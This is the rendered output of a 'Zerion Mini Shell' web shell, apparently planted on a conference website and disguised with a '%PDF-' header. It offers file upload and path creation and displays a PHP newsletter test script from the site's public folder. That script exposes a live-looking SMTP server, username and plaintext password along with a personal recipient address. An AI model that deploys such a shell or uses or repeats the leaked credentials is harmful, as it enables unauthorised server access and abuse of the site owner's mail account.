%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/alliance/domains/congress-eldw.eu/public_html/
Upload File :
Create Path :
Current File : /home/alliance/domains/congress-eldw.eu/public_html/a-newsletter_mail_test2.php

<?php
include_once("inc/config.php");
include_once("inc/functions.php");
include_once("inc/init.php");
include_once("inc/session.php");
include_once("inc/phpmailer/class.phpmailer.php");

$db = new BaseOps;

if($_POST['lang'] == 1) $langue = "fr";
if($_POST['lang'] == 2) $langue = "en";

$values = array(
	"envoye" => 1
);

$file = fopen ("mailtemp.html", "a+");
$message = fread($file, filesize("mailtemp.html"));
fclose($file);







	$subject="=?UTF-8?B?".base64_encode(stripslashes("Demoweek : test"))."?=";
	$headers= "From: \"Demoweek\" <".$email_noreply.">\n";
	$headers.='Content-type: text/html; charset=utf-8';
	//mail($data['email'], $subject, $message, $headers);
	
	$mail = new PHPMailer();
	$mail->CharSet = 'UTF-8';
    $mail->From = $email_noreply;
	$mail->FromName = "Demoweek";
	$mail->Subject = "test";
	$mail->MsgHTML(str_replace("#IDUSER#",1*561,$message));
 
    //$mail->AddAddress($data['email']);
	$mail->AddAddress("jklesxb@gmail.com");
	$mail->IsSMTP(); // telling the class to use SMTP
	$mail->SMTPDebug  = 0;                     // enables SMTP debug information (for testing)
	$mail->SMTPAuth   = true;                  // enable SMTP authentication
	$mail->Host       = "smtp.octomail.info"; // sets the SMTP server
	$mail->Port       = 587;                    // set the SMTP port for the GMAIL server
	$mail->Username   = "sedl@octomail.info"; // SMTP account username
	$mail->Password   = "2UFvaB1eqj5QeQv8";       
	$mail->send();
	
	


echo ' <span class="succed">Envoyé</span>';

?>

Zerion Mini Shell 1.0